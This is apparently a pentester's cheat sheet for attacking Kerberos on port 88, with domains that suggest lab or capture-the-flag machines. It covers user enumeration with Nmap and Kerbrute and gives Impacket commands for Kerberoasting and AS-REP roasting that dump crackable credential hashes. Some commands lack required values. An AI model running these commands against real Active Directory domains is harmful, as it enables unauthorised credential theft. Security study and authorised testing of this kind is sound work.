# Port 88 - Kerberus

# Enumerate users

# Nmap

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='fusion.corp',userdb=users.txt

# Kerbrute

1-Create a list of usernames (don’t forget to add Administrator and Guest)
2-Enumerate the domain name
3-Run the enumeration script

DNS_Domain_Name: SECRET.org
./kerbrute userenum /home/kali/users.txt -d secret.org --dc
#git clone https://github.com/ropnop/kerbrute.git

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting.

ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

# Retrieving Kerberos Tickets

Impacket has a tool called GetNPUsers.py (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

# Attempt to get a list of user service principal names:

GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs

# Get the Hash - TGT (ASPROASTABLE)

GetNPUsers.py 'fusion.corp/' -usersfile lparker.txt -no-pass -dc-ip -format hashcat -outputfile hashes
GetNPUsers.py fusion.corp/lparker -no-pass -request -outputfile lparker.krb